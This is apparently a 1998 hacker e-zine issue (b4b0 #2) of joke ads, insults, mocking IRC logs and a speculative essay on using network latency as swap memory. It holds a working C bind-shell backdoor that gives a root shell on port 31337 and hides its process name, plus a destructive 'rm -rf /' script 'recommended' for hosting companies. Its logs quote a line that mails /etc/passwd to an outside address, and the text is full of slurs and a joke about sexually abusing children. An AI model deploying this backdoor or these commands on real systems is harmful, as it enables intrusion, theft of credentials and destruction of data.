. $&y ,p& y&$ ., ,a8888a, $$' ,d$$$ $$' .s$',8P"' `"Y8, . yxxx.$$.xxxxxxxxxxxx.,d$"`$$.x.$$.xxxxxxxx.,8P.xxxx.s`$$,.xxxg $ P' $$,d$$Yba, ,d$" d $$ $$,d$$Yba, 88 ,$.$$$ $ $ ' $$P' ,`$$a ,d$" ``" $$ , $$$P' ,`Y$a 88 ,s$,$$$ . $ $ $$k g Y$$ $$$$$$$$$$$$$ $$f d d$$ `8b ,$$'d$$' ,d $ bxxx.$$$, '`,d$".xxxxxxxx.$$.x.$$b, ',a$$".x`8ba,,aad$$'.xxxxd. . s$Y"Y$bd$P',yas. s$$z $Y"Y$$$P"' "Y$$$$(headflux)$ pxxxxxxxxxxxxxxxxxxxxxxxxxxxg $$ $ issue # 002 - shm4ck! $ +-+-+-+-+ $$ . bxxxxxxxxxxxxxxxxxxxxxxxxxxxd |b|4|b|0| (c) 1998 $$ $$ $$ +-+-+-+-+ $$ - > b4b0[ii] $$ $$s. [ All Rights Reserved and Shit ] .s$$ $$ ss $$ D1STR0 S1T3Z: $$ $$ www.c0t.org/b4b0 $$ $$ veloweb.com/b4b0 $$ $$ www.linenoise.org/b4b0 $$ $$s. .s$$ .- -. [ this b4b0 product is a registered trademark of the b4b0 corporation ] [ within the United States and other countries. All other brand and ] [ product names are trademarks of their respective companies. ] `- -' [*][***************************************************][*] [*] b4b0's disclaimor: we guarentee nothing so fuck you [*] [*][***************************************************][*] 4b0!b4b0! - -> b4b0 # 2 <- - 4b0!b4b0!b b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! - -> thiz episodez theme: <- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - we can all become better people by making fun of so1o and so1o's ways - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - *********** -[ issue # 2 ]- *********** #x# .0. the usual sm4ck (warnings, sayings, shoutoutz, etc) #x# *** .1. a word from ge0rge - edit0r in cheif *** e.e .2. eye are see l0gz - b4b0 inc. e.e zZz .3. network latency page swapping - jsbach zZz \%/ .4. a backdoor thingie majiggor - r4lph m4lph \%/ ^^^ .5. summ3r con review - seegn4l ^^^ @z@ .6. cooldeth - gR3-0p @z@ xxx .7. sekret picturez of a 2600 staff meeting xxx QqQ .8. making linux snifferz - v0id QqQ *** .9. b4b0 tak3z g0ld at the special olympicz - ky00 *** 0x0 .0. b4b0-cr4q - seegn4l 0x0 vvv .1. ASM part I - f1ex vvv ^^^ .2. b4b0 gn00z - some newz sourcez fux0rz ^^^ ^v^ .3. review of SecCon - ph1sh the aussie be0tch ^v^ x-x .4. internals - aqua x-x o.o .5. the end o.o --- .6. --- .-=-=-=-=-=-=-=-> zEE b4b0 staff <-=-=-=-=-=-=-=-=-. [ in no particular order ] n4me pr0nounciat1on ---- -------------- ge0rge the elite gerbil (jEE-orj thEE e-leet jerr-bul) phFh4Ck3r (pEE eTch eFF ha-ker) r4lph m4lph (rall-ff mal-ff) thE miLk (thah mill-kk) seegn4l (see-ga-nall) l0hrdz (lord-zz) tEEp (tEEp) dEhp0ozy (dEh-poo-zee) gR3-0p (gREE-Awp) lh0ar (l0rr) ky00 (ky0o) [][ th3 official shit of b4b0! ][] ] tHE Official drink of b4b0 : YooHoo (c) ] b4b0 spokesman for number #2 : alf (the furry du0d) ] the b4b0 place-to-be : /dev/null ] b4b0's official sweatshop manager : Kathy Lee Gifford ] Official Idiot of the Month : so1o of the united kingdom * woopie * (cheq section 2) ] keeper of b4b0s smack : o.j. simpson (orenthawl jamez) ] b4b0's gang colors : puke green ] fucking idiots who didnt make : meta3@undernet idiot of the month h-S-t@undernet ] b4b0s h0t gurlie of the m0nth : chiXy ] PATR0N S4INT OF b4b0! : Stoner ] song that fucking r0x : "So Wat'cha Want" -beastie boys - - - - - - - | b4b0 misc.| - - - - - - - - the best part of waking up, is b4b0 in your cup! - The Few, The Proud, The b4b0! - b4b0: don't leave home without it! - b4b0: the fresh maker! - b4b0: goes on clear, no sticky residue! - b4b0: like a rock. - b4b0, built b4b0 tough. - b4b0, official sponser of the 2000 games. - b4b0, for upset stomachs. - Always b4b0 cola. - A pill that helps men with erectile dysfunction respond again - b4b0! - b4b0 (elitefil erate) tablets (Let the dance begin) - b4b0 : Fit For Men - Introducing the first and only zine clinically proven to treat hair loss in men - b4b0. - b4b0: open up to complete relief. - Imagine. A crisp, refreshing, mountain waterfall in your kitchen. That's the beauty of b4b0. It turns tap water into wonderful water. The remarkable filter virtually eliminates lead and chlorine. Copper, water hardness and sediment are dramatically reduced. There's nothing like the greate taste of b4b0. And you never have to leave your home sweet home. - b4b0 relieves your sneezing, and itchy, runny nose - even your stuffy nose. b4b0 works for a full 24 hours. b4b0 won't put you to sleep or keep you awake like some antihistamines and decongestants do. b4b0 is a prescription drug for patients 12 years of age and over. Effectiveness of b4b0 depends on reglar use, but it is not addictive. Symptons may begin to improve within 12 hours. Maximum nasal symptom relief may take serveral days. The most common side effects (nasal burning, nasal irritation, nosebleeds, headache and sore throat) occured in fewer than 7 our of 100 people. Only your doctor or health care provider can determine the best treatment option for you. - b4b0 is well tolerated. It has a low occurence of side effects, which occured about as often as they did with placebo (sugar pill). Most common were headache, occuring with 12% of people; drowsiness, 8%; fatigue, 4%; and dry mouth, 3% ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ b4b0 warnings ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ Warning: Women who are pregnant must not use or handle broken b4b0 tablets for risk of a serious and specific birth defect. 54% readers of b4b0 maintained their current leetness, 46% regained some leetness. WARNING: THIS PRODUCT IS NOT A SAFE ALTERNATIVE TO CIGARETTES SURGEON GENERALS WARNING: b4b0 Contains Carbon Monoxide. In clinical trials, b4b0 was well tolerated. Some men experienced side effects, including headache, facial flushing, and upset stomach. A small percentage of men experienced mild and temporary visual effects. Like all presecription products, b4b0 may cause side effects. A very small number of men experienced certain side effects, such as: less desire for sex, difficulty in acheiving an erection, and a decrease in the amount of semen. Each of these side effects occured in less than 2% of men. These Side effects were reversible and went away in men who stopped taking b4b0. They also disappeared in most men (58%) who continued taking b4b0. SURGEON GENERALS WARNING: b4b0 Can Cause Heart Disease, Lung Cancer, Emphysema, and May Complicate Pregnancy. .- -. : shout outz : `- -' gilette (for being the best-a-man-can-get), pee wee herman, pennywise the clown (off of the movie "The It"), jews, interns, hot girliez, you idiots who make laxatives, the m4ny motherz of b4b0!, the black panthers, the grey panthers (you old fuqz), 'disgruntled' government employeez, creators of viagra (thnx again), jsbach, allah (w0rd!), and to all those people i stepped on to get here (fr0m ge0rge), sadjester for distr0 site, sector9 for distr0 site, gRE-0p for distro site, and vect0rx for distr0 site. thankz. .- -. : fuck you's : `- -' Janet Reno, America On-Line for mass producing warez kiddies by the thousands, Giga-Pet creators, the whitey oppressors who try to bring the black man down, people who oppress the whiteys that are trying to oppress the black man, oppression, congress, the chinese government, france, the province of quebec (fucking weird bitches), the state of arkansas, princess diana (stupid h0 never gave respect to b4b0!), tampon commercials on t.v. while ge0rge is eating dinner, genital herpes commercials on t.v. when phFh4ck3r is eating dinner, people who beg for cod3z, people with the Oedipus Complex, [1 - a w0rd from ge0rge ] -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! .x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x hi again. this is ge0rge, your editor, bringing you another compact issue of b4b0(tm). With the great reviews of b4b0[i], we could do no less than produce b4b0[ii], another, anally satisfying issue of b4b0! (which will probably be followed by b4b0[iii], b4b0[iv], b4b0[v] and so on.) I do hope you enjoy this and if not, go kill yourself, because nobody likes you. Anyways, in this issue a lot more people submitted articles due to my constant badgering and molestation :>. So, As always, b4b0 is the freshmaker. Enjoy! .ge0rge -the almighty editor (until coup or death) -[ EyE ArE sEe lawgz ]- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x -- my smack is in (/root) -- cat b4b0-irc.logs -[ logs of : overdose on #2600, efnet ]- i fuck the shit outta 12yr olds i don't know shit every white man respects me as they would anyone else except for the nerdy playa haters that don't like all the bitches and shit i got i ain't jus a wigger i got game when me and my niggas roll up in an avenger puffin herb they'll wanna roll i'll take your hoes you l0ve b4b0! just admit it yup but b4b0 doesn't love you i love it it fuckin rules it owns it's teh shit cuz we've g0t no love for h0ez **=[ this is why b4b0 has nominated so1o as the idiot of the month ]=** -- my smack is in (/root) -- cat so1o and so7o, you don't put asm codes in buffer overflow exploit codes π shokkwave thinks anyone who doesnt know how overflows work are too green for this channel and you ar just jealout cause i am a real hacker that has nothing to do with it. canul - so if the program is running as root , your shell will so too DMRAP..... no colores d00d and you are just a new school poser and you ar just jealout cause i am a real hacker HAHAHAHAH do you honestly believe yer a real hacker? i have hacked lots of shit kn so if I have a file on a server that's 666 how can I exploit the overflow? HAHAHA im logging this. and what have you done nothing are you talking to me so7o? I have hacked lots of shit too but I'm not a hacker you have owned jack shit canul - wah? HAHAHAHAHAHA hahahah and what have you done oh kn? How do I write on a program that runs suid? Most admins have it -w nothing OK you have owned jack shit c0d3 z3r0 ph333r n4t10n !@#@$@@ jsbach so7o, what do you know BEST about computers? tell me i owned spice world a 'buffer overflow' is when a piece of data overwrites the return pointer pushed onto the stack when entering a function, when the overwritten return pointer later is popped from the stack, the program executes abritrary code, usually resulting in a crash or core dump. Canul: just exploit the ones that are already +s Just because you can hack doesn't mean you are a ahcker, even I know that. so eat my fuck !@#@ poser t34m b4b0 0wnz c0d3 z3r0 SO7O WHAT DO YOU KNOW? WHAT IS YOUR BEST SKILL? hax0r999 that's ASN AT&T syntax mov long push long now shut the fuck up jsbach so7o: rsh -l bin spicworld.com csh -i bwahahahahah t34mb4b0! uNF you dumb whore owning haha jsbach jsbach: hahahaha you are a poser :)) so7o, so "owning" is what you know best simple as that you havent owned shit IF YOU UNDERSTAND WEAKNESSES YOU COULD TELL ME WHAT AN OVERFLOW IS. so? heh. jsbach: 10 to 1 he says overfilling a glass eheh hjahahahaha hahah http://reality.sgi.com/nate_engr/machines/security/ thats it so7o, school me in system weaknesses. IF YOU UNDERSTAND WEAKNESSES YOU COULD TELL ME WHAT AN OVERFLOW IS. lol hah ωνω phonetap [WhyBother@m71.istal.com] has joined #hackphreak i have ttdserver warez so7o, wanna trade? and you are just jealous cause i wouldnt put mscan in CRH ωνω realitie [~realitie@ARO-PC142.ARMY.MIL] has joined #hackphreak hah i never asked you to put shit in CRH mron heh ANYONE KNOWS SOME PROG.TO ACCESS SOMEBODIE'S COMPUTER BY HE'S IP# AND PORT# s/mron/moron/ i have dgux statd ok lets trade. so7o, scroll a program you've written. please do. soltool!@#$ man sunscan heheh was huge a C program. not shell script. cat /etc/passwd | mail tk457@hotmail.com u pheer No jbasch it's going to overflow the buffer. To much calls to printf. :-] ... you are a coder ...i am a hacker ..lets just get this straight hmm. HAHAHAHAHA coders supply you with sk1llz you are a coder ...i am a hacker ..lets just get this straight FUCKEN WHO CARES, NOT ME Recharge: 4 eye a/\/\ 31337 eye 0\/\/|\| U you are a coder ...i am a hacker ..lets just get this straight you leech BWAHAHAHAHAHAHAHAAH coders are hackers hackers are not necessarily coders i dint flood you leech dood no you leech heh Recharge: 4 eye a/\/\ 31337 eye 0\/\/|\| U you are a coder ...i am a hacker ..lets just get this straight you are a coder ...i am a hacker ..lets just get this straight HAHAHAHAHAHAHAHAHAH i can code this and that ...but i just can root systems for shit uh #hack don't like peeps who 0wn pages. they prefer coders hahah ya that is a fucking joke no. but as so7o said. you are a coder ...i am a hacker ..lets just get this +straight fjear $ cat solo.txt Session Start: Wed Jul 01 02:50:00 1998 y0u the3re? yeah ok hook me up with 0-day sendmail code!%$*& on windows now Session Close: Wed Jul 01 02:52:04 1998 Session Start: Wed Jul 01 02:53:36 1998 damnit just hook me up and i'll send you stuff when i get it Session Close: Wed Jul 01 02:54:16 1998 Session Start: Wed Jul 01 02:58:21 1998 it's not as if you'll be loosing out at all.. the main reason i want such programs is for personal use, i am a security consulta nt after all.. and i always get paid alot more for penetration testing work if i actually break into the hosts Session Close: Wed Jul 01 02:59:11 1998 Session Start: Wed Jul 01 03:04:55 1998 of course, i'd use the sendmail or whatever to break in, then i'd just make it look like i used another hole.. like a sniffed l/p c'mon man.. you gotta help me out Session Close: Wed Jul 01 03:05:56 1998 Session Start: Wed Jul 01 04:39:40 1998 this irc sploit wont work it works how can i have a 12byte nick? dalnet =) ok... also which order do i run the progs etc.? dang then i just dcc chat them right.. or do i get a # make a makefile compile them into one binary ok send me a makefile du0d u dunno how to do a makefile? of course i do so i make the 3 .o's dang then i cc -o blah 1.o 2.o 3.o right? Session Close: Wed Jul 01 04:45:40 1998 Session Start: Wed Jul 01 04:47:37 1998 damnit this doesn't work y0 Session Close: Wed Jul 01 04:49:19 1998 Session Start: Wed Jul 01 04:49:42 1998 send me the Makefile !"%&^* Session Close: Wed Jul 01 04:52:38 1998 Session Start: Wed Jul 01 04:55:01 1998 y0 whats that exploit you just pasted? just some 0-day stuffs man just tgz all your stuff and send hehehe Session Close: Wed Jul 01 04:57:25 1998 $ [ erm, more funny logs! ] i cant even drive so id have to hit you with my bike syringe_, you weinie ahaha ill use my moms sand cruiser!!)(@$ why u got aol because my parents busted me for DOS attacks bahahhahahahaha bahahha how did ur parents bust u? I cant do them from AOL They caught me [ logs donated ] what is this channel discussion usually about? msequence: masterbation cool torquin' it can be fun! ωνω mode!#technotronic +b *!*NeverSoft@*.unt.edu by cL0ut [t/v] msequence was kicked off #technotronic by cL0ut (DIE) anyone think they can hack my schools page? i would appreciate it IRC's about trading warez - that's really all it's worth... well, that and keeping touch. :) -[3 - network latency page swapping - jsbach -x- -x- -x- -x- -x- -x- -x- - b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! .x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x jsbach, august, 1998. . werd to b4b0. As far as I know the ideas described in this article are original. If they aren't, or you have suggestions or comments, mail me at: jsb4ch@hotmail.com *[ Disclaimer ]* Have some sort of imagination when reading this article. The concepts aren't the most practical or sane, but they illustrate a new way to think about network resources. *[ Network memory ]* We can exploit the fact that the internet is slow, using its latency as a temporary sort of local "memory". When I send an ICMP echo datagram from my home in California to a box in Korea, it usually takes between 2 and 5 seconds before I get a reply. During these few seconds, the ICMP header and whatever data appended are "saved" on the network, albeit not reliably. Obviously, data being saved on a network is completely different than data being saved on disk; we have more and more complex problems to deal with when proposing to swap pages to "network" memory. The biggest problem with network memory is that you never know when you'll be getting what you saved (to the network) back (by "saved to the network" I mean encapsulated in a latent ICMP echo packet.) For example: suppose we have only 4 bytes of memory (wh0a); All the bytes are occupied, so we swap one byte that we aren't using to network memory, by putting it in an ICMP echo and sending it off to Korea. Now, we fill the byte we just freed with a new value, and low and behold, our ICMP echo is back again. Now we have to discard it, because we have no room for it.. So we have just lost our memory :( Another problem is that even if we know when the ICMP echo reply is coming back, and we make room for it (i'm just assuming here that we have space in physical memory for it), there will have been no point to having copied it out to the network in the first place, because for the 5 seconds it was in transit, we couldn't free the memory it once occupied (we needed a place to store the data once it was returned.) *[ Page juggling. ]* (Definition: "swap to network memory" : To take memory, put it in an ICMP echo datagram headed for a preferrably far-away [large RTT] host, and to free the memory it occupied.) I think page juggling addresses the problems stated in the previous section. The analogy is simple. A juggler has two hands, and three juggling balls. As a rule he can hold only one ball in each hand, so he must have at least one ball in the air at all times. When the ball in the air decends upon the jugglers left hand, he throws the ball in his left hand up into the air, so at this point there are two balls in the air. Now for a as-parallel-as-possible computer analogy: Suppose we have 3 pages (3 * 2048) of memory we need to store, and the machine we're on only has 2 pages of physical memory. [NOTE: Of course, A page is an arbitrary unit here, but when considering implementing page juggling in the virtual memory subsystem alongside page stealing (swapping pages to hard disk) its useful to think in terms of pages. Bleh. ] To "juggle" the pages, we load 2 pages into the memory initially, and swap one to network memory, When we know the swapped page is coming back (we discuss HOW we know when a swapped page is coming back below...) we swap another page to network memory to make room for the returning page. If that was confusing read this paragraph again. We can determine when our network-swapped page is coming back by sampling the round trip time to the remote host frequently. This isn't very reliable, so we should allow for a large margin of error when deciding when to swap off a page to make room for a returning page. This is obfuscated logic... Let's break this down into steps. 0 seconds -> pages 1 & 2 loaded into physical memory 0 - 2048 2048 - 4096 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ p a g e 1 | p a g e 2 | - - - - - - - - - - - - - - - 0.01 seconds -> page 2 swapped to network memory, round trip time is sampled, it is 4 seconds. 0 - 2048 2048 - 4096 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ p a g e 1 | free space | (page 2 is in an ICMP echo en route for - - - - - - - - - - - - - - - Korea.) 0.02 seconds -> page 3 swapped into the space page 2 occupied. 0 - 2048 2048 - 4096 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ p a g e 1 | p a g e 3 | (page 2 is in an ICMP echo en route for - - - - - - - - - - - - - - - Korea.) 3.01 seconds -> Page two will be back soon, so we swap page 1 to network memory to make room for it. 0 - 2048 2048 - 4096 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ free space | p a g e 3 | (pages 2 & 1 are in an ICMP echo en route for - - - - - - - - - - - - - - - Korea.) 4 seconds -> Page 2 returns. 0 - 2048 2048 - 4096 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ p a g e 2 | p a g e 3 | (page 1 is in an ICMP echo en route for - - - - - - - - - - - - - - - Korea.) et cetera. . . . *[ The effects. Good/bad/whatever. ]* There are a number of very critical problems with the page juggling concept. For one, if you want to access memory in a page swapped to network memory, you need to wait until the page returns, which could be, at worst, a number of seconds. And of course there is a significant amount of overhead in CPU and bandwidth when you're sending a lot of data all the time. Networks weren't meant to hold data, they were meant to transport it. If everyone used network memory as a sort of swap space, the internet would be pretty fucked up! Anyways, I think it would still be cool to hack linux to use network memory as a ternary medium for page stealing, so that when swap space ran out it could be used as a last resort. *[ Implementing network latency page swapping in the kernel. ]* The concepts behind page stealing in a generic UNIX kernel are applicable with some modification to the concepts behind page juggling. A brief description of page stealing: When the kernel runs out of physical memory (RAM), it can "steal" pages from processes, and put them on the hard disk, using it as a source of secondary memory. When the process wants to access a stolen page, it is summoned up from the hard disk. Pages of kernel memory aren't swapped out, because a kernel that swaps in and out its own pages would be pretty tangled :). Since the hard disk has a much slower access time (than RAM), we would like to swap out the pages that are accessed the least frequently. In many UNIX kernels, when a page is accessed, the "dirty" bit in the page is set, telling the pager not to swap out this page; it has been accessed recently. The pager goes around and clears the dirty bit off each page every so often. We can take a page and swap it to the hard disk (duh). But we can't simply take a page and swap it to network memory, we need to swap pages in pairs (this is what I call juggling). Swapping a single page to network memory is like tossing a ball up and down with one hand.. we gain nothing from doing it. Of course, we don't have to juggle pages in pairs, we could use triplets, quadruplets, or whatever... But juggling pages in pairs doubles our local memory, whereas juggling triplets gives us a %33 page gain, et cetera. For example: If we swap 2 megabytes of memory to network, at any given time, 1 megabyte will be somewhere on the internet, encapsulated in ICMP echo datagrams; this frees that 1 megabyte of memory. Anyways, the point is, we need to implement an algorithm in the kernel that finds two clean pages and juggles them. We could latch onto the existing page stealing subsystem to do this. *[ Proof of concept source code ]* /* write me. */ -[4 - backd0or by r4lph m4lph ]- x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! .x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x /* b4b0.c - Ok so1o, listen carefully. This backdoor just binds a shell to * the port of your choice on any given mashine. You can compile * this to support password authentication or to just drop you into * a root shell. Compile with -DPASSAUTH to suppost password auth. * "WHAT!??!?" you say so1o? No, you cant just use your traditional * cc teknEEq. Modify the line that says strcpy(argv[0], ""); to hold * whatever you want the backdoor to apear as to ps. You can easily * modify this to run whatever you want on the server when connected * to. * august something/98 * by r4lph m4lph..... * gardener of the b4b0 drug fields in Bogota, Columbia. */ #include #include #include #include #include #include #include #include #define PORT 31337 /* p0rt */ #define MSG "w3rD t0 d4 skrEEp7 k1dz\n" #define SHELL "/bin/sh" #ifdef PASSAUTH #define PASSWD "fuQ_l4mB" /* p4sswh0rd */ #endif #define YES 1 /* y3z 3y3 fuQ l4mBz */ #define NO 0 /* n0 3y3 dEEd n0t fuQ m0n1qA */ int main(int argc, char *argv[]); #ifdef PASSAUTH int login(int EffDee); #endif int main(int argc, char *argv[]) { int sockfd, newfd, size; struct sockaddr_in local; struct sockaddr_in remote; strcpy(argv[0], ""); signal(SIGCHLD, SIG_IGN); /* 1gn0re th3 d1e1ng fUq1ng k1dz */ bzero(&local, sizeof(local)); local.sin_family = AF_INET; local.sin_port = htons(PORT); local.sin_addr.s_addr = INADDR_ANY; bzero(&(local.sin_zero), 8); if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } if(bind(sockfd, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(1); } if(listen(sockfd, 5) == -1) { perror("listen"); exit(1); } size = sizeof(struct sockaddr_in); while(1) { if((newfd=accept(sockfd, (struct sockaddr *)&remote, &size)) == -1) { perror("accept"); exit(1); } if(!fork()) { send(newfd, MSG, sizeof(MSG), 0); /* s4y h1 t0 so1o */ #ifdef PASSAUTH if(login(newfd) != 1) { send(newfd, "FUCK OFF\n", 9, 0); /* s4y bY3 t0 so1o */ close(newfd); exit(1); } #endif close(0); close(1); close(2); dup2(newfd, 0); dup2(newfd, 1); dup2(newfd, 2); execl(SHELL, SHELL, (char *)0); close(newfd); exit(0); } close(newfd); } return(0); } #ifdef PASSAUTH int login(int EffDee) { char u_passwd[15]; int i; send(EffDee, "Password: ", 11, 0); /* l0g1n so1o */ recv(EffDee, u_passwd, sizeof(u_passwd), 0); for(i=0;i TR0N, have you ever coded anything? Dethcraze - have u? hah yes gob - heh [gob_(gob@h24-64-200-168.ss.wave.shaw.ca)] AHAHAHAHHAAHHAAHHAHA gr1p, yes. what? a script that automatically rm -rf /'s a server ? uhm, no. # rm -rf / script, coded by dethcraze, [gob_(gob@h24-64-200-168.ss.wave.shaw.ca)] HAHhaHAHAHhaHAHAhahHAhAHaHAHAhAh # use only on prohosting.com heheheh rm -rf / lol gr1p ;) # ./rmrfscript I had nothing to do with prohosting.com *********************************************************************** Oh, so VeNoMouS contradicts you now? I thought a group were suppose to be on the 'same level', guess not! *********************************************************************** wow your el8! gimme that script please !! :)) ok, i'm just a victim to media exploitation hehe heh It is a rumor that JP, the media whore, started. ************************************************************************* I think this should be past onto JP, becuase thats slander, and thats against the law, and remember this was said in #phrack, not some small channel. ************************************************************************* so who rm'd it dethcraze? jsbach, How would I know? Probably "t0tal-ka0s". ******************************************************************** More accusations, he really is digging himself deep into a hole now. ******************************************************************** i heard it straight you rm -rf /'d prohosting its unethical and bad! bet that took skill i bet it did too he even coded some el8 script to help him out rm is complicated gr1p, I am not like that. yeah yeah dethcraze - not the impression i get I never do any malicious things. ********************************************************************** h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#!!@ h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0#$@!#! That above line kept me laughing for days. It even made my motd..wow! ********************************************************************** hehehe ok so JP just got it off the top of his head deth? oh shit i forgot # rm -rf / script coded by dethcraze (props to VeNoMouS) geez. i don't like JP, but i don't think he'd do that. Hmm. jsbach, He would, and he did. okay um. are you trying to imply that a media reporter would lie gr1p, I don't know, ask him. i will but first i want your opinion on the matter ************************************************** More allegations towards JP and AntiOnline *gasp* ************************************************** gr1p, "t0tal-ka0s" probably made up some story to get the spotlight off of them. HAHAH those #tk guys rm'd it? Thats what I seriously think happened. hmm. i have a log which says you and venomous rm'd it Because paralyse gave me some logs of them talking about a bunch of shit about prohosting. no gr1p, I had nothing to do with it. Send me this log. this was in #hackphreak. dethcraze I never go into #hackphreak the log is on that ircmostwanted.org site dethcraze - um..don't u? ah i forgot your too badass for that ********************************************************************* More allegations thrown at other people, this really is hotting up to becoming a cr4zy conspiricy - THE JP/#TK AFFAIR. ********************************************************************* check out www.coolio.org gr1p Coolio is a DoS kiddie. and you are a rm -rf / kiddie. now go to sleep or something hah heh *********************************************************************** End of conversation in #phrack, I think he gave up, decided he couldn't win, so the conversation went into msg's *********************************************************************** [dcc(SEND)] dethcraze [msg(dethcraze)] ACCEPT DU0D#@$@#$#@!$@! [DethCraze(bliss@d28-kl01-klwn-pdi.attcanada.net)] No. [msg(dethcraze)] why not?#@?$@# i improved your script@#!# [DethCraze(bliss@d28-kl01-klwn-pdi.attcanada.net)] I did not make a script. [msg(dethcraze)] YES YOU DID@#$@! you said you did in #phrack@# [DethCraze(bliss@d28-kl01-klwn-pdi.attcanada.net)] I made a program [DethCraze(bliss@d28-kl01-klwn-pdi.attcanada.net)] That lets you write to any tty. [msg(dethcraze)] AND THE PROGGIE IS BACKDOORED@#!@ WITH RM -RF /#$$##$ [DethCraze(bliss@d28-kl01-klwn-pdi.attcanada.net)] No, it's not. [msg(dethcraze)] yes! yes it is! *********************************************************** He didn't accept the dcc :(. So I had to paste the script. *********************************************************** ωνω Starting conversation with dethcraze [msg(dethcraze)] #!/bin/bash [msg(dethcraze)] # rm -rf / script [msg(dethcraze)] # aptly named dethrm.sh [msg(dethcraze)] # coded by Dethcraze with help from VeNoMouS [msg(dethcraze)] # props to milw0rm and FUCK WIPO!@#@# [msg(dethcraze)] # [msg(dethcraze)] # Use on big hosting companies is recommended! [msg(dethcraze)] rm -rf / [msg(dethcraze)] # EOF [DethCraze(bliss@d28-kl01-klwn-pdi.attcanada.net)] -ignored- [msg(dethcraze)] EH0EH0EH0HE0HE0HE0EH0 ************************************************************************ There you have it, that was enough for DethCraze as he put me on ignore. Oh well, we spoke long enough for him to look foolish and thats all that counts! ************************************************************************ =============================================================================== Many people have been asking for that script because they think DethCraze is cool coz he got in AntiOnline. Ok, here it is, I was thinking of posting it to rootshell.com but i thought i'd make it a b4b0 exclusive!@# <--------------------CUT HERE B4B0 LUBBIN GRRL13Z--------------------> #!/bin/bash # rm -rf / script # aptly named dethrm.sh # coded by Dethcraze with help from VeNoMouS # props to milw0rm and FUCK WIPO!@#@# # # Use on big hosting companies is recommended! rm -rf / # EOF <--------------------END HERE B4B0 LUBBIN GRRL13Z--------------------> There ya have it.... The Decision is yours ---> ELITE or #HACKPHREAK?@#? DethCraze can often be found idleing in #phrack efnet, so why not take time out thos visit him and say h1 and ask him to teach you some of his el8 rm'ing sk1llz.... gR3-0p t34m b4b0! -[7 - a picture of a 2600 staff m33ting ]- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x THIZ PICTURE WAREZ IS SERIOUSLY 0 DAY. IM NOT LYING. ANYWAYS THIS PICTURE WAS RECOVERED USING A SUPER HI ZOOM PHOTO LENZ B4B0 CAMERA X240. BEWARE. *************************** **[ BTW, THIS IS A .JPG ]** *************************** begin 644 2600-meeting M_]C_X``02D9)1@`!`0$`2`!(``#__@`G1FEL92!WH.$A8:'B(F*DI.4E9:7F)F:HJ.DI::GJ*FJLK.TM;:WN+FZPL/$Q<;'R,G* MTM/4U=;7V-G:X>+CY.7FY^CIZO'R\_3U]O?X^?K_Q``?`0`#`0$!`0$!`0$! M`````````0(#!`4&!P@)"@O_Q`"U$0`"`0($!`,$!P4$!``!`G<``0(#$00% M(3$&$D%1!V%Q$R(R@0@40I&AL<$)(S-2\!5B7J"@X2%AH>( MB8J2DY25EI>8F9JBHZ2EIJ>HJ:JRL[2UMK>XN;K"P\3%QL?(RKR\_3U]O?X^?K_V@`,`P$``A$#$0`_`*F?E(S#CKT[S8&<9`7BI4KNP(:YXP3P>:KLN M"2#@5*>Y(8^W%5W?!QD_C6=5)HZ*3:V'QE@#3J25K(YTV3I.%C; M/6J8D\Q^>.:B\Q/+(SR.15=2N?O<5A&+>@.YIRR^2AE\W"(N<8SFJ]E=F]59 MFB5#UX;.1Z^U7-$MS/)N(W(#WZ5ORVD7D,D<2*=O&U0*52M%>ZUJ;QYHZE"V M4W0$<9^8C`^M9VIZ7);W$!NC&TFW!",<`U9LI'@NU,:Y)X/M3]::V?("XR6.`*LV6F22$ ML["-!155IHJGK3U(3R<]J3`(/%:C6L*+MCW%O[QQ1:6>9#YB@@'TJN8E(QH` MZ2&(?=_A/MZ5:DC<1M\O..E;K:?"^,)CGM3VLUC4^7U[G%0_(IRZG,$;4`/! M'&*H:E(1$$')8XYKKI=,6ZW=$Q_$:Q-4T>6$AP0X7T"FE8::O=G%WIDBF MQC@]*YOQ+-/;PQ2I)L+@K@=Z]#DAB<U<3XUAC$EE:@@R,Q<^PITKN1 